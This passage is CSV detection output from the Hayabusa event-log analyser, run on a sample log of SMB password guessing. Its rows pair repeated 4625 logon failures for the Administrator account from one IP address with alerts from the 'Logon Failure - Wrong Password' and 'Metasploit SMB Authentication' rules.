NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WotargyGlEq9PBch : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2JSMrPoucOR0nzlD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jr4w4uoF2DVZ5n9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v319oZIaOBpuf542 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GNRTL9BLlGWMx6dA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHlDIOZ9B5uY8Rzz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Dr2bvAue8mr5kagX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXBds9GoXr6IZUfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLYuegjXO18lo342 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: To3MMEEvNXKNjKHT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N0HCToTmh3ESGBYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nNvBueVo3ANNmSSN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVWOoAG5ermGL2Gl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W7QYJUNPm5b4jprh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PHllwNJvpH3P97cp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tfT8GtafHGYMlkMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: nab7wtZfBVkcynsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHiijj7sT9nyqxii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v06kkhqYNOyEHx2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WSTDX16YK5Zgkjxo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u6QWEyTrpndCagP0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7iCaXa5SR5IHJnQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DNZhcPd1JaNFZMYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LeOIg10KS60QplWz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: um3Nwo2doDbKJJvz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JuoqbUwc2Nth1xlH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WF8zKIbeboTLLkC6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kSyKc8igfuYLMekV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LHog0TdOci9CCKBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R5ilFaQlemZUSNun : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOJnv9vFdqr2VSQC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rXaoVN7FvJ5rRDUF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kaFCT5QYFfmJpEC1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOdVfL4XUTLp60tC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFQSXjz0JTlkwpBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgAVlnENp6IzRRDr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JLkeKKFVP5vJjPtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqLXdGmr45vGpu3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m7uTpMLqPgenJdRb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQn7NqRzpGtjQdfv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8F8EZLHQtEWkeob1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5joxW81M9vcAfbJw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iMfmQF3xsaV5SQVZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQe9VL8eeco0SdPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MnMbxQEuczrnMLKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3DWOiTIp6JQLq9Vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
